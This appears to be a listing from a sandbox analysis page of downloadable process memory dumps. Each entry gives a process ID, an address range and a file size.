Download
memory/2928-139-0x000001CB40600000-0x000001CB40650000-memory.dmp

Filesize
320KB

Download
memory/2928-178-0x000001CB40650000-0x000001CB4065A000-memory.dmp

Filesize
40KB

Download
memory/2928-113-0x000001CB40540000-0x000001CB40580000-memory.dmp

Filesize
256KB

Download
memory/2928-179-0x000001CB406A0000-0x000001CB406B2000-memory.dmp

Filesize
72KB

Download
memory/2928-199-0x000001CB3FA70000-0x000001CB3FC8C000-memory.dmp

Filesize
2.1MB

Download
memory/3016-176-0x000001CF74650000-0x000001CF7486C000-memory.dmp

Filesize
2.1MB

Download
memory/3248-83-0x000001EDA8230000-0x000001EDA844C000-memory.dmp

Filesize
2.1MB

Download
memory/4164-164-0x0000018D7F8D0000-0x0000018D7FAEC000-memory.dmp

Filesize
2.1MB

Download
memory/4608-100-0x0000020DBE490000-0x0000020DBE6AC000-memory.dmp

Filesize
2.1MB

Download
memory/4964-137-0x000001DFCD6C0000-0x000001DFCD8DC000-memory.dmp

Filesize
2.1MB

Download
memory/5004-0-0x00007FF866E23000-0x00007FF866E25000-memory.dmp

Filesize
8KB

Download
memory/5004-88-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/5004-87-0x0000029420860000-0x0000029420A7C000-memory.dmp

Filesize
2.1MB

Download
memory/5004-34-0x0000029420C10000-0x0000029420C3C000-memory.dmp

Filesize
176KB

Download
memory/5004-33-0x00007FF8831F0000-0x00007FF8832AE000-memory.dmp

Filesize
760KB

Download
memory/5004-32-0x00007FF884FF0000-0x00007FF8851E5000-memory.dmp

Filesize
2.0MB

Download
memory/5004-31-0x0000029420850000-0x0000029420862000-memory.dmp

Filesize
72KB

Download
memory/5004-14-0x0000029420ED0000-0x0000029420F46000-memory.dmp

Filesize
472KB

Download
memory/5004-13-0x0000029420E80000-0x0000029420EC4000-memory.dmp

Filesize
272KB

Download
memory/5004-12-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/5004-11-0x00007FF866E20000-0x00007FF8678E1000-memory.dmp

Filesize
10.8MB

Download
memory/5004-10-0x0000029420A80000-0x0000029420AA2000-memory.dmp

Filesize
136KB

Download